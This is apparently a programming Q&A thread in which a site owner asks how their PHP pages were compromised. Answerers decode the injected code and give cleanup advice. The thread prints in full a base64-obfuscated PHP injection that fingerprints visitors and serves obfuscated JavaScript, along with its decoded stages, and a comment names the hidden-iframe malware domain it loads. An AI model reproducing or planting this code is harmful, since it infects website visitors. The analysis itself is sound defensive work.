# Can <script type="text/javascript">window.location="/";</script> be hacked?

Tags: php, javascript, security, base64, eval

My PHP files, especially index.php files with JavaScript redirects like:

```
<script type="text/javascript">window.location="/";</script>
```

Are hacked like this:

```
<?php eval(base64_decode(
'JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQ
nXTskZGJmPSRkci4nLycubWQ1KCRkci4nMScpOw0KaWYoKHN0cnBvcygkdWEsJ1dpbmRvd3MnKSE9PWZhbHNlKSYmKChzdHJwb3MoJHVhLCdNU0lFJykhPT1
mYWxzZSl8fChzdHJwb3MoJHVhLCdGaXJlZm94JykhPT1mYWxzZSkpJiYoc3RycG9zKEBmaWxlX2dldF9jb250ZW50cygkZGJmKSwkaXApID09PSBmYWxzZSk
pew0KCWVycm9yX3JlcG9ydGluZygwKTsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdZV0p5WlNzcmZXTmhkR05vS0dFMlltRXpOSGt
wZTNSeWVYdHdjbTkwYjNSNWNHVW1NbjFqWVhSamFDaGhjMkZpS1h0bFBYZHBibVJ2ZDFzaVpTSXJJbllpS3lKaGJDSmRPMzE5SUdsbUtERXBlMlk5V3kwMEx
DMDFMRGt3TERnNUxERTRMREkxTERnM0xEazNMRGcwTERFd05DdzVOU3c0Tml3NU55d3hNRElzTXpFc09UQXNPRGNzTVRBeExEVTJMRGswTERnMkxEazJMRGc
zTERrMUxERXdNeXd4TURFc05URXNNVEE0TERjd0xEZ3lMRGt3TERZMExEZ3lMRGsyTERnM0xESTFMREkyTERnMExEazJMRGczTERFd055d3lOQ3d5T0N3M05
5d3pNeXc0TUN3eU55d3hNRGdzTUN3dE5Td3ROaXd0TkN3NU1TdzROeXd4TURFc09ETXNPVFFzT0Rnc01UQXdMREkxTERJNExEUTFMQzB5TEMwMExDMDFMREV
4TUN3eE9TdzROeXc1TXl3eE1ESXNPRGNzTVRjc01URXdMQzB4TEMwMkxDMDBMQzAxTERnMUxEazRMRGcxTERFd01pdzVOaXc0Tnl3NU5Td3hNRE1zTXpJc01
UQTBMREV3TVN3NU1Td3hNREVzT0Rnc01qWXNNVGtzTkRjc09URXNPRGNzTVRBeExEZ3pMRGswTERnNExERTRMREV3TUN3eE1ERXNPRFVzTkRZc01qWXNPVEF
zTVRBeExERXdNeXc1T0N3ME15d3pOQ3d6TXl3eE1ESXNPVElzTVRBM0xERXdOeXc1TkN3NU1pdzVPU3d6TXl3NE55d3hNRGNzTVRBMExEZ3pMRE14TERnMkx
EazNMRGswTERNMExERXdOQ3c0TkN3ek15dzVPQ3c0T1N3NU9TdzBPU3c0T0N3NU9DdzBOeXd6TlN3eU5pd3hPQ3d4TURRc09USXNPRFlzTVRBeExEa3hMRFE
zTERJMExETTJMRE0wTERJMExERTVMRGt3TERnMkxEa3lMRGc1TERnNUxERXdNeXcwTnl3eU5Dd3pOaXd6TkN3eU5Dd3hPU3d4TURFc01UQXhMREV3T0N3NU5
DdzROaXcwT0N3eU5Td3hNRE1zT1RJc01UQXhMRGt3TERnMUxEa3hMRGt6TERreUxERXdNaXd4TURZc05EVXNPVEFzT1RBc09EY3NPRFlzT0RZc09UY3NORFV
zT1Rjc09UZ3NNVEF4TERrd0xERXdNeXc1TVN3NU5pdzVOeXcwTkN3NE1pdzROU3d4TURFc09UWXNPVFVzTVRBekxERXdNU3c0T0N3ME5TdzVNeXc0T0N3NE9
Dd3hNREVzTkRVc016UXNORFFzTVRBekxEazNMRGszTERRMUxETTBMRFEwTERJMkxEUTRMRFExTERNMExEa3hMRGczTERFd01TdzRNeXc1TkN3NE9DdzBPQ3d
4T1N3eU9DdzBOU3d0TWl3dE5Dd3ROU3d4TVRBc01Dd3ROU3d0Tml3NE9Td3hNRE1zT1RVc09EWXNNVEF5TERrd0xEazRMRGsyTERFM0xEa3lMRGc0TERrNUx
EZzBMRGsxTERnMkxERXdNU3d5Tml3eU5pd3hNVEFzTFRFc0xUWXNMVFFzTFRVc01UQXpMRGcwTERFd01Dd3hOeXc0T1N3eE9DdzBOaXd4T1N3NE5pdzVOaXc
0Tml3eE1ETXNPVFFzT0Rnc09UWXNNVEF4TERNekxEZzFMRGs1TERnNExEZ3pMREV3TVN3NE9DdzFOU3c1TXl3NE9DdzVOU3c0Tml3NU55d3hNRElzTWpVc01
qWXNPVEVzT0Rjc01UQXhMRGd6TERrMExEZzRMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXc0Tnl3eE1ERXNOVElzTVRBeUxERXdNU3d4TURFc09URXNPRE1
zTVRBMExERXdNaXc0Tml3eU55d3lOU3d4TURBc01UQXhMRGcxTERJMExETXhMREkxTERnNUxERXdNeXd4TURJc09UY3NORFVzTXpNc016SXNNVEEwTERreEx
ERXdOaXd4TURrc09UTXNPVEVzTVRBeExETXlMRGcyTERFd09Td3hNRE1zT0RJc016TXNPRFVzT1RZc09UWXNNek1zTVRBekxEZzJMRE15TERrM0xEa3hMRGs
0TERRNExEa3dMRGszTERRMkxETTNMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXd4TURJc01UQTJMRGsxTERnM0xETXhMREV3TlN3NU1Td3hNREFzT1RJc09
EUXNPVEFzT1RVc09URXNNVEF4TERFd09DdzBOeXd5TkN3NU1TdzVNU3c0TlN3NE55dzROeXc1TlN3eU5pdzBOU3c0Tnl3ek15d3hNREVzTVRBeExERXdPQ3c
1TkN3NE5pd3pNeXc1T0N3NU5pd3hNRElzT1RFc01UQXhMRGt5TERrM0xEazFMRFE0TERJMUxEZ3lMRGcxTERFd01TdzVOaXc1TlN3eE1ETXNNVEF4TERnNEx
ESTFMRFEwTERnNUxETXlMREV3TUN3eE1ETXNNVEEzTERrekxEZzRMRE15TERrekxEZzRMRGc0TERFd01TdzBPQ3d5TlN3ek15d3lOaXcwTlN3NE55d3pNeXd
4TURFc01UQXhMREV3T0N3NU5DdzROaXd6TXl3eE1ESXNPVFlzT1Rrc05EY3NNalFzTXpVc01qVXNORFFzT0Rrc016SXNNVEF3TERnNExERXdNaXcxTUN3eE1
ETXNNVEF5TERrNUxEa3lMRGcwTERFd01pd3hNRE1zT0Rjc01qVXNNallzTVRBMUxEa3dMRGczTERFd01pdzRPU3d5Tml3ek1Dd3lOQ3d6Tml3ek5Dd3lOQ3d
5T0N3ME5TdzROeXd6TXl3eE1ERXNPRFlzTVRBekxEVXhMREV3TVN3eE1ETXNNVEF3TERrd0xEZzFMREV3TXl3eE1ERXNPRGdzTWpZc01qUXNPVEVzT0Rjc09
UQXNPVEFzT1RBc01UQXhMREkyTERNd0xESTBMRE0yTERNMExESTBMREk0TERRMUxDMHlMQzAwTEMwMUxDMDJMRGczTERrM0xEZzBMREV3TkN3NU5TdzROaXc
1Tnl3eE1ESXNNekVzT1RBc09EY3NNVEF4TERVMkxEazBMRGcyTERrMkxEZzNMRGsxTERFd015d3hNREVzTlRFc01UQTRMRGN3TERneUxEa3dMRFkwTERneUx
EazJMRGczTERJMUxESTJMRGcwTERrMkxEZzNMREV3Tnl3eU5Dd3lPQ3czTnl3ek15dzRNQ3d6TWl3NE1pdzVPU3c1T0N3NE5pdzVOeXc0Tml3MU1pdzVNU3c
1TVN3NU15dzROeXd5Tml3NE55d3lPQ3cwTlN3dE1pd3ROQ3d0TlN3eE1UQmRPMzEzUFdZN2N6MWJYVHR5UFZOMGNtbHVaenQ0UFNKcUpTSTdabTl5S0drOU1
Ec3RhU3MxTnpraFBUQTdhU3M5TVNsN2FqMXBPMmxtS0dVbUppZ3dNekU5UFRCNE1Ua3BLWE05Y3l0eUxtWnliMjFEYUdGeVEyOWtaU2dvTVNwM1cycGRLMlV
vZUNzektTc3hNeWtwTzMwZ2RISjVlMkZ6WjJGelp5WXhNMzFqWVhSamFDaGhjMmRoS1h0bEtITXBPMzA4TDNOamNtbHdkRDQ9JykpOw0KCWlmICgkZnAgPSB
AZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?>
<script type="text/javascript">window.location="/";</script>
```

Is it because I am using `$_SERVER["REQUEST_URI"]` or `$_SERVER["HTTP_REFERER"]` or some other command - do they need stripping like `mysql_real_escape_string`

Comment: That’s not a question. Could you add some more detail?

Comment: Well, you sayd yourself, that it can and that it is hacked ...

Comment: Your server has been compromised and is being used to infect your visitors with malware. Get it off the net *now*, clean up the hacks, check all your client PCs are clean, and change all your passwords.

Answer (score 1, accepted):

You appear to have an html (php) block injected into your page.  Possibly the result of [XSS](https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29)?

**First stage decode reveals:**

```
$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr.'1');
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){
    error_reporting(0);
    echo(base64_decode('PHNjcmlwdD50cnl7YWJyZSsrfWNhdGNoKGE2YmEzNHkpe3RyeXtwcm90b3R5cGUmMn1jYXRjaChhc2FiKXtlPXdpbmRvd1siZSIrInYiKyJhbCJdO319IGlmKDEpe2Y9Wy00LC01LDkwLDg5LDE4LDI1LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwyNywxMDgsMCwtNSwtNiwtNCw5MSw4NywxMDEsODMsOTQsODgsMTAwLDI1LDI4LDQ1LC0yLC00LC01LDExMCwxOSw4Nyw5MywxMDIsODcsMTcsMTEwLC0xLC02LC00LC01LDg1LDk4LDg1LDEwMiw5Niw4Nyw5NSwxMDMsMzIsMTA0LDEwMSw5MSwxMDEsODgsMjYsMTksNDcsOTEsODcsMTAxLDgzLDk0LDg4LDE4LDEwMCwxMDEsODUsNDYsMjYsOTAsMTAxLDEwMyw5OCw0MywzNCwzMywxMDIsOTIsMTA3LDEwNyw5NCw5Miw5OSwzMyw4NywxMDcsMTA0LDgzLDMxLDg2LDk3LDk0LDM0LDEwNCw4NCwzMyw5OCw4OSw5OSw0OSw4OCw5OCw0NywzNSwyNiwxOCwxMDQsOTIsODYsMTAxLDkxLDQ3LDI0LDM2LDM0LDI0LDE5LDkwLDg2LDkyLDg5LDg5LDEwMyw0NywyNCwzNiwzNCwyNCwxOSwxMDEsMTAxLDEwOCw5NCw4Niw0OCwyNSwxMDMsOTIsMTAxLDkwLDg1LDkxLDkzLDkyLDEwMiwxMDYsNDUsOTAsOTAsODcsODYsODYsOTcsNDUsOTcsOTgsMTAxLDkwLDEwMyw5MSw5Niw5Nyw0NCw4Miw4NSwxMDEsOTYsOTUsMTAzLDEwMSw4OCw0NSw5Myw4OCw4OCwxMDEsNDUsMzQsNDQsMTAzLDk3LDk3LDQ1LDM0LDQ0LDI2LDQ4LDQ1LDM0LDkxLDg3LDEwMSw4Myw5NCw4OCw0OCwxOSwyOCw0NSwtMiwtNCwtNSwxMTAsMCwtNSwtNiw4OSwxMDMsOTUsODYsMTAyLDkwLDk4LDk2LDE3LDkyLDg4LDk5LDg0LDk1LDg2LDEwMSwyNiwyNiwxMTAsLTEsLTYsLTQsLTUsMTAzLDg0LDEwMCwxNyw4OSwxOCw0NiwxOSw4Niw5Niw4NiwxMDMsOTQsODgsOTYsMTAxLDMzLDg1LDk5LDg4LDgzLDEwMSw4OCw1NSw5Myw4OCw5NSw4Niw5NywxMDIsMjUsMjYsOTEsODcsMTAxLDgzLDk0LDg4LDI1LDI2LDQ2LDg4LDMxLDEwMiw4NywxMDEsNTIsMTAyLDEwMSwxMDEsOTEsODMsMTA0LDEwMiw4NiwyNywyNSwxMDAsMTAxLDg1LDI0LDMxLDI1LDg5LDEwMywxMDIsOTcsNDUsMzMsMzIsMTA0LDkxLDEwNiwxMDksOTMsOTEsMTAxLDMyLDg2LDEwOSwxMDMsODIsMzMsODUsOTYsOTYsMzMsMTAzLDg2LDMyLDk3LDkxLDk4LDQ4LDkwLDk3LDQ2LDM3LDI1LDI2LDQ2LDg4LDMxLDEwMiwxMDIsMTA2LDk1LDg3LDMxLDEwNSw5MSwxMDAsOTIsODQsOTAsOTUsOTEsMTAxLDEwOCw0NywyNCw5MSw5MSw4NSw4Nyw4Nyw5NSwyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMyw5OCw5NiwxMDIsOTEsMTAxLDkyLDk3LDk1LDQ4LDI1LDgyLDg1LDEwMSw5Niw5NSwxMDMsMTAxLDg4LDI1LDQ0LDg5LDMyLDEwMCwxMDMsMTA3LDkzLDg4LDMyLDkzLDg4LDg4LDEwMSw0OCwyNSwzMywyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMywxMDIsOTYsOTksNDcsMjQsMzUsMjUsNDQsODksMzIsMTAwLDg4LDEwMiw1MCwxMDMsMTAyLDk5LDkyLDg0LDEwMiwxMDMsODcsMjUsMjYsMTA1LDkwLDg3LDEwMiw4OSwyNiwzMCwyNCwzNiwzNCwyNCwyOCw0NSw4NywzMywxMDEsODYsMTAzLDUxLDEwMSwxMDMsMTAwLDkwLDg1LDEwMywxMDEsODgsMjYsMjQsOTEsODcsOTAsOTAsOTAsMTAxLDI2LDMwLDI0LDM2LDM0LDI0LDI4LDQ1LC0yLC00LC01LC02LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwzMiw4Miw5OSw5OCw4Niw5Nyw4Niw1Miw5MSw5MSw5Myw4NywyNiw4NywyOCw0NSwtMiwtNCwtNSwxMTBdO313PWY7cz1bXTtyPVN0cmluZzt4PSJqJSI7Zm9yKGk9MDstaSs1NzkhPTA7aSs9MSl7aj1pO2lmKGUmJigwMzE9PTB4MTkpKXM9cytyLmZyb21DaGFyQ29kZSgoMSp3W2pdK2UoeCszKSsxMykpO30gdHJ5e2FzZ2FzZyYxM31jYXRjaChhc2dhKXtlKHMpO308L3NjcmlwdD4='));
    if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
}
```

**Second Stage Decoding Reveals:**

```
try {
    abre++
} catch (a6ba34y) {
    try {
        prototype & 2
    } catch (asab) {
        e = window["e" + "v" + "al"];
    }
}
if (1) {
    f = [-4, - 5, 90, 89, 18, 25, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 27, 108, 0, - 5, - 6, - 4, 91, 87, 101, 83, 94, 88, 100, 25, 28, 45, - 2, - 4, - 5, 110, 19, 87, 93, 102, 87, 17, 110, - 1, - 6, - 4, - 5, 85, 98, 85, 102, 96, 87, 95, 103, 32, 104, 101, 91, 101, 88, 26, 19, 47, 91, 87, 101, 83, 94, 88, 18, 100, 101, 85, 46, 26, 90, 101, 103, 98, 43, 34, 33, 102, 92, 107, 107, 94, 92, 99, 33, 87, 107, 104, 83, 31, 86, 97, 94, 34, 104, 84, 33, 98, 89, 99, 49, 88, 98, 47, 35, 26, 18, 104, 92, 86, 101, 91, 47, 24, 36, 34, 24, 19, 90, 86, 92, 89, 89, 103, 47, 24, 36, 34, 24, 19, 101, 101, 108, 94, 86, 48, 25, 103, 92, 101, 90, 85, 91, 93, 92, 102, 106, 45, 90, 90, 87, 86, 86, 97, 45, 97, 98, 101, 90, 103, 91, 96, 97, 44, 82, 85, 101, 96, 95, 103, 101, 88, 45, 93, 88, 88, 101, 45, 34, 44, 103, 97, 97, 45, 34, 44, 26, 48, 45, 34, 91, 87, 101, 83, 94, 88, 48, 19, 28, 45, - 2, - 4, - 5, 110, 0, - 5, - 6, 89, 103, 95, 86, 102, 90, 98, 96, 17, 92, 88, 99, 84, 95, 86, 101, 26, 26, 110, - 1, - 6, - 4, - 5, 103, 84, 100, 17, 89, 18, 46, 19, 86, 96, 86, 103, 94, 88, 96, 101, 33, 85, 99, 88, 83, 101, 88, 55, 93, 88, 95, 86, 97, 102, 25, 26, 91, 87, 101, 83, 94, 88, 25, 26, 46, 88, 31, 102, 87, 101, 52, 102, 101, 101, 91, 83, 104, 102, 86, 27, 25, 100, 101, 85, 24, 31, 25, 89, 103, 102, 97, 45, 33, 32, 104, 91, 106, 109, 93, 91, 101, 32, 86, 109, 103, 82, 33, 85, 96, 96, 33, 103, 86, 32, 97, 91, 98, 48, 90, 97, 46, 37, 25, 26, 46, 88, 31, 102, 102, 106, 95, 87, 31, 105, 91, 100, 92, 84, 90, 95, 91, 101, 108, 47, 24, 91, 91, 85, 87, 87, 95, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 98, 96, 102, 91, 101, 92, 97, 95, 48, 25, 82, 85, 101, 96, 95, 103, 101, 88, 25, 44, 89, 32, 100, 103, 107, 93, 88, 32, 93, 88, 88, 101, 48, 25, 33, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 102, 96, 99, 47, 24, 35, 25, 44, 89, 32, 100, 88, 102, 50, 103, 102, 99, 92, 84, 102, 103, 87, 25, 26, 105, 90, 87, 102, 89, 26, 30, 24, 36, 34, 24, 28, 45, 87, 33, 101, 86, 103, 51, 101, 103, 100, 90, 85, 103, 101, 88, 26, 24, 91, 87, 90, 90, 90, 101, 26, 30, 24, 36, 34, 24, 28, 45, - 2, - 4, - 5, - 6, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 32, 82, 99, 98, 86, 97, 86, 52, 91, 91, 93, 87, 26, 87, 28, 45, - 2, - 4, - 5, 110];
}
w = f;
s = [];
r = String;
x = "j%";
for (i = 0; - i + 579 != 0; i += 1) {
    j = i;
    if (e && (031 == 0x19)) s = s + r.fromCharCode((1 * w[j] + e(x + 3) + 13));
}
try {
    asgasg & 13
} catch (asga) {
    e(s);
}
```

And then there is further payload obfuscated via a Javascript Packer.  I'll fool around with this a bit more later in the afternoon for those interested in seeing the function of this...

Comment: Just to add, you can see what that JS does by substituting the last `e(s)` by `alert(s)` and running it. It basically opens a hidden `iframe` to `uiyzkjr.ezua.com/vc.php?go=2`. Chrome reports the site as malware, didn't bother to look what it does.

Answer (score 2):

The problem is that your PHP code itself was hacked. You can try base64 decoding all that text to see what it's doing, but someone or something has access to modify your PHP file. The javascript has nothing to do with it.

If you're running something like wordpress, you can see [what they recommend](http://codex.wordpress.org/FAQ_My_site_was_hacked). First, though, you need to change all of your passwords. Then look to see how someone is modifying your code. And make sure that your files are not writable ([try 755 instead of 777](http://drupal.org/node/39887), for instance).

Answer (score -1):

If you're using PHP you can just use a header redirect instead, then you won't have to worry about JavaScript vulnerabilities:

```
header('Location: http://www.example.com/');
```

This will have to come before anything is outputted to the DOM. If SEO is a factor you may also consider using .htaccess redirects.

Comment: The question is showing PHP code, not JavaScript code, it is not a JavaScript vulnerability.